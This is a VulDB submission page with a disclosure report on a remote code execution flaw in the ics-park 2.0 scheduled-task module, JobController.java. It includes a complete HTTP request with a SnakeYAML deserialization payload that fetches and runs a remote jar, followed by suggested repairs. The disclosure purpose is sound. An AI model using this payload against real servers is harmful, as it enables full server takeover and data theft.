| Titel | fcba_zzm ics-park 2.0 Code Injection |
|---|
| Beschreibung | A Remote Code Execution Vulnerability In ics-park via Scheduled Tasks
# NAME OF AFFECTED PRODUCT(S)
* ics-park
## Vendor Homepage
https://gitee.com/fcba_zzm/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
* yyjccc , ChangeYourWay , Aiyakami
## Vulnerable File
* JobController.java
## VERSION(S)
* V2.0
## Software Link
* [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park)
# PROBLEM TYPE
## Vulnerability Type
* Remote Code Execution
## Root Cause
* The scheduled task module in the vulnerable version does not validate or restrict the target method string during task creation and update. As a result, attackers can specify arbitrary methods such as `org.yaml.snakeyaml.Yaml.load`. When the scheduler executes the task, it directly invokes the provided method without any security checks, allowing malicious payloads to be deserialized and executed, ultimately leading to remote code execution.
## Impact
* Attackers can create malicious tasks that allow remote execution of arbitrary code on the affected server.
* This may lead to full compromise of the server, including manipulation or destruction of business data and logic.
* Sensitive information could be exposed, privileges escalated, and the vulnerability may enable lateral movement within the internal network.
# DESCRIPTION
* The vulnerability exists in the scheduled task management module. When an administrator creates or updates a scheduled task, the application directly accepts user-supplied method references without validating or restricting them. As a result, an attacker who gains administrative access to the application can craft malicious input that is executed by the scheduler with the server’s privileges. This flaw enables arbitrary code execution on the server, potentially leading to a complete compromise of system integrity, confidentiality, and availability.
# Vulnerability details and POC
## Vulnerability lonameion:
* **`JobController.java`**
## Payload:
Example: attacker saves a malicious scheduled task
```notranslate
POST /api/monitor/job/save HTTP/1.1
Host: localhost:8000
appId: 123456
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Referer: http://localhost:8000/monitor/job
sec-ch-ua-platform: "Windows"
token: d6e3601d372b42ffb2eaad21aa6b3598
Origin: http://localhost:8000
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
sign: 96782c8471657d1505b795009245cef0
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept-Encoding: gzip, deflate, br, zstd
Content-Length: 307
{"jobId":0,"jobName":"aaa","jobGroup":"DEFAULT","invokeTarget":"org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:7878/yaml-payload.jar\"]]]]')","cronExpression":"0 15 10 * * ?","misfirePolicy":"1","concurrent":"0","status":"0"}
```
## The following are screenshots of some specific information obtained from testing and running:
<img width="1849" height="948" alt="Image" src="https://github.com/user-attachments/assets/262df39a-e0e2-4c92-bdb1-a1f2959f6e80" />
<img width="1852" height="959" alt="Image" src="https://github.com/user-attachments/assets/0ac209fa-30f8-402c-807b-ceeab3f58844" />
# Suggested repair
1. Implement whitelist validation: Restrict scheduled task execution to a predefined set of safe and explicitly allowed methods. Reject or block any unrecognized or unsafe method strings.
2. Enhance input validation: Apply strict input checks and sanitization when adding or updating scheduled tasks to prevent injection of arbitrary methods.
3. Update RuoYi code: Upgrade to the latest secure version of RuoYi where this issue has been addressed, or apply the official security patches once available. |
|---|
| Quelle | ⚠️ https://github.com/Yyjccc/CVE/issues/1 |
|---|
| Benutzer | Yyjccc (UID 89726) |
|---|
| Einreichung | 02.09.2025 12:51 (vor 8 Monaten) |
|---|
| Moderieren | 13.09.2025 17:13 (11 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 323829 [fcba_zzm ics-park Smart Park Management System 2.0 Scheduled Task JobController.java erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|